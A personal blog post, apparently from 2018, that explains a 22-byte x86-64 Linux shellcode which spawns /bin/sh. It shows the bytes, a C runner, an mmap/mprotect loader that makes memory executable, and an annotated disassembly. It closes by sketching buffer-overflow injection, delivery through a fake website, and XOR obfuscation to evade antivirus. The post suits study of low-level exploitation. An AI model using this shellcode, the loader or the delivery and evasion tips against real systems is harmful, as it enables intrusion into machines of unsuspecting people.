A post about shellcode
Jun 10, 2018
So you may ask yourself, like I did: what is shellcode? And the deeper you dig, the more questions you will ask yourself; well, that's how it went with me. I am not a shellcode guru, but I would like to share my knowledge: when I write or teach about something, I understand it better (I think). This is not a giant introduction explaining everything, it's more about a journey of digging into shellcode. To answer the first question, shellcode is nothing more than a bunch of binary code like this:
\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05
But what is shellcode really? And what the hell does the above code do?! I'll answer the second question directly: it spawns a shell on a 64-bit Linux system. Now we get a hint, so shellcode is operating system and CPU architecture bound? Yup, that's right, shellcode is operating system and CPU architecture specific. Now what is the code above? The code is binary, represented here as hexadecimal numbers. I didn't get it at first. At first I was like: "this is hex, I'll just parse this with a hex parser", but these are raw bytes, and most of them don't have a readable ASCII representation. So what is shellcode really? Shellcode is machine code: binary data that can be read directly by a CPU. In fact it's just 0s and 1s, and when you feed a CPU this data, it can read it and execute whatever it says. I don't believe you, show me the code!
Ok here it is:
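#include <stdio.h>
/* the shellcode bytes, stored as a C string literal */
char *code = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
int main () {
    /* treat the address of the bytes as a pointer to a function returning int */
    int (*ret)() = (int(*)()) code;
    /* call it: the CPU jumps to the first byte of the shellcode */
    ret();
    return 0;
}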
Compile it with gcc and run it:
$ gcc shell.c -o shell
$ ./shell
You will need to execute it on a 64-bit Linux system. If it runs, you will see that it spawned /bin/sh.
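One caveat: on newer toolchains the string literal may end up in memory that is readable but not executable, and then ./shell just segfaults instead of giving you a shell. Below is a minimal sketch of one way around that, assuming Linux with mmap and mprotect: copy the bytes into a fresh page and mark that page executable. The helper name make_executable_copy is made up for this example, it is not part of the original program.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/* Hypothetical helper: copy len bytes into a new anonymous mapping and
 * flip that mapping from read/write to read/execute.
 * Returns NULL if the mapping or the permission change fails. */
void *make_executable_copy(const void *bytes, size_t len) {
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) {
        return NULL;
    }
    memcpy(mem, bytes, len);
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return NULL;
    }
    return mem;
}
```

The returned pointer can then be cast to a function pointer and called the same way as code in shell.c.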
How this line int (...); really works, I don't know 100%. What I do know is that it takes the pointer to the character array "code", which was put into memory, and treats that address as a pointer to a function. I want to say it executes here, but this line does not execute the shellcode; it only sets things up so that ret points to the address of the shellcode. The call ret(); on the next line is what makes the CPU jump there. Can you explain it even vaguer? Sorry, maybe a better explanation in a next post :). But now we go deeper into the shellcode. Let's analyze that bunch of binary and see if there is something readable in it. The readable ASCII range goes from 21 to 7E hex, or 33 to 126 decimal, see man ascii:
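#include <stdio.h>
#include <string.h>
char * code = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
int main () {
    /* strlen is fine here because the shellcode contains no zero bytes */
    size_t len = strlen(code);
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char) code[i];
        /* print only the readable ASCII range 0x21..0x7e */
        if (c >= 0x21 && c <= 0x7e) {
            printf("%c", c);
        }
    }
    printf("\n");
    return 0;
}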
The output of the previous program is:
RH/bin//shSH<$;
So we see something like "/bin//sh". Interesting, but this is not the right way to go. A better approach is to look at the assembly code, which is how I wrote the shellcode in the first place.
Disassembly of section .text:
0000000000400080 <_start>:
  400080:  f7 e6                   mul    esi
  400082:  52                      push   rdx
  400083:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
  40008a:  2f 73 68
  40008d:  53                      push   rbx
  40008e:  48 8d 3c 24             lea    rdi,[rsp]
  400092:  b0 3b                   mov    al,0x3b
  400094:  0f 05                   syscall
What the shit is "0x68732f2f6e69622f"?? Yeah, my first reaction too. It is actually super straightforward: remember "/bin//sh" from 10 seconds ago? Well, that is that:
Let's take a look at the piece in the middle:
\xf7\xe6\x52\x48\xbb   \x2f\x62\x69\x6e\x2f\x2f\x73\x68   \x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05
\x2f \x62 \x69 \x6e \x2f \x2f \x73 \x68
Now there is something called little endian, which I always forget about: a multi-byte value is stored in memory with its least significant byte first. So to read these 8 bytes (64 bits) as one number, you reverse them:
\x68 \x73 \x2f \x2f \x6e \x69 \x62 \x2f
0x68732f2f6e69622f
Read as ASCII, that number is hs//nib/, which if we reverse it is /bin//sh.
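The byte reversal can also be checked in code. This is a small sketch, not something from the original shellcode: pack_le64 is a hypothetical helper that builds the 64-bit number a little-endian CPU would see when loading 8 bytes from memory.

```c
#include <stdint.h>

/* Hypothetical helper: build the 64-bit value a little-endian CPU sees
 * when it loads the 8 bytes at s. s[0] becomes the least significant
 * byte and s[7] the most significant one. */
uint64_t pack_le64(const char *s) {
    uint64_t value = 0;
    for (int i = 7; i >= 0; i--) {
        value = (value << 8) | (unsigned char) s[i];
    }
    return value;
}
```

Calling pack_le64("/bin//sh") gives 0x68732f2f6e69622f, the constant from the movabs instruction.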
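But why /bin//sh and not /bin/sh? The simplest explanation: otherwise it won't work. The string has to fill the 8-byte register exactly, "/bin/sh" is only 7 bytes, and the extra "/" pads it to 8 without needing a zero byte. Linux treats repeated slashes in a path as a single one, so it still points to /bin/sh. There is another magic value in the assembly, "0x3b", which is hex for 59, the syscall number of the Linux system call execve. See https://filippo.io/linux-syscall-table/ for a complete list of syscall numbers.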
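To make the difference between the two spellings visible, here is a tiny sketch. The helper has_zero_byte is hypothetical and only exists for this illustration: it checks whether an 8-byte chunk contains a zero byte, which is what the shellcode avoids everywhere else too.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: returns 1 if the first len bytes of buf contain
 * a zero byte, 0 otherwise. */
int has_zero_byte(const char *buf, size_t len) {
    return memchr(buf, 0, len) != NULL;
}
```

The literal "/bin/sh" is 7 characters plus the terminating zero, so has_zero_byte("/bin/sh", 8) is 1, while has_zero_byte("/bin//sh", 8) is 0.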
Better commented assembly code:
Disassembly of section .text:
0000000000400080 <_start>:
  400080:  f7 e6                   mul    esi                        ; eax * esi -> edx:eax, which zeroes rax and rdx when eax or esi is 0
  400082:  52                      push   rdx                        ; push the value in rdx (now 0) to the stack, it ends the string with zero bytes
  400083:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f     ; "/bin//sh" as a little-endian 64-bit number
  40008a:  2f 73 68
  40008d:  53                      push   rbx                        ; push the string "/bin//sh" to the stack
; load the address held in the stack pointer, which points to "/bin//sh", into rdi (the first syscall argument)
  40008e:  48 8d 3c 24             lea    rdi,[rsp]
; load the value 59 into register al (the low byte of rax), which is used as an identifier for system calls
  400092:  b0 3b                   mov    al,0x3b
; execute the system call according to the value in register rax
  400094:  0f 05                   syscall
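In C terms, the assembly above boils down to a single execve system call. The following is a rough sketch under my own assumptions, not a translation the compiler would produce: exec_like_shellcode is a made-up name, and unlike the shellcode, which leaves rsi as it found it, this version takes argv as a parameter.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical helper: make the same system call the shellcode makes.
 * rax = SYS_execve (59 on x86-64), rdi = path, rsi = argv, rdx = envp.
 * On success it never returns; on failure it returns -1 and sets errno. */
long exec_like_shellcode(const char *path, char *const argv[]) {
    return syscall(SYS_execve, path, argv, NULL);
}
```

Called with "/bin//sh" as the path, this would replace the running process with a shell, just like the 22 bytes above.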
Probably some people will ask: "But how can I hack with this?". Well there are 2 ways that I know of:
- The first is inserting it. I am not going to explain this in detail, there is enough on the internet about it. The way it goes is: a program is an ordered sequence of instructions, and when an instruction ends, the CPU moves on to the next one. Now at a certain point you insert shellcode into the program's memory, with the goal that when the CPU moves on, it executes your shellcode instead of the intended next instruction. This is possible when you can overflow a buffer, so that the overflowed part overwrites memory the program uses to decide where to continue, such as a saved return address. Your shellcode is part of the overflowing data, and you tweak it with a NOP sled: do-nothing instructions added in front of your shellcode, so that the jump does not have to land exactly on its first byte.
- The second way is to let a person execute it. The oldest way in the book, and still the most effective, is social engineering of course. A simple fake website with a valid ".exe" and you are good to go. Now there is a catch of course: you need to bypass antivirus, IDS or IPS. So what you need to do is obfuscate your payload. A very easy trick is apparently to XOR your payload, but I don't have that working 100% at the moment, so it will be for another post.